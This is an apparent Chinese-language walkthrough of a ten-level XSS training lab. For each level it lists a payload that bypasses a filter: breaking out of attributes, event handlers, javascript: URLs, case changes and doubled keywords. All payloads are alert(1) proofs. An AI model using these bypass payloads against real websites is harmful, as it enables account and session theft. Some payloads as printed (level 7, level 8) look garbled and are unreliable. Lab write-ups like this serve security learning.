lv1 直接弹窗

payload:<script>alert(1)</script>

lv2 闭合input，弹窗

payload:test"/><script>alert(1)</script>

lv3 发现双引号"逃逸不出来inptu,于是尝试单引号'发生改变，然而还是逃逸不出来，只好使用javascrpt:alert(1),由于有文本框，直接用onclick。

payload:dsadsa' onclick='javascript:alert(1)

lv4 尝试逃逸Inptu失败，且尖括号被过滤，尝试直接闭合“”“”后文本框弹窗

payload:adsadsa" onclick="alert(1)

lv5 规则测试后，发现script\on,大小写被过滤,注意到尖括号已经超出边界，那么使用标签+javascript绕过。

payload:test"/><a href="javascript:alert(1)" />

lv6 用lv5的payload时，发现href被分割过滤，采用大小写替换,成功弹窗。

payload:test"/><a hReF="javascript:alert(1)" />

lv7 用之前的payload失效且无用，发现on/script直接被replace成空，那么采用双写关键字绕过。

payload:test" oonnclick="java:alert(1)

LV8 添加友情链接，尝试<a src="javascript:alert(1)" />发现问题后采取utf-8编码绕过。

utf-8编码尝试绕过。

payload:javascript:alert(1)

#javascript:alert(1)

LV9 链接不合法，那么用编码弹窗+合法链接触发弹窗。

payload:javascript:alert(1)//http://www.baidu.com

LV 10 无文本框那么直接在url搜索，发现隐藏表单的参数有：t_link,t_history,t_sort,那么构造表单为：&t_sort=1'时有参数传入，如下，那么给该参数制造一个文本框，利用其触发弹窗。

payload:well done!&t_sort=1" type="text" onmouseover="alert(1)"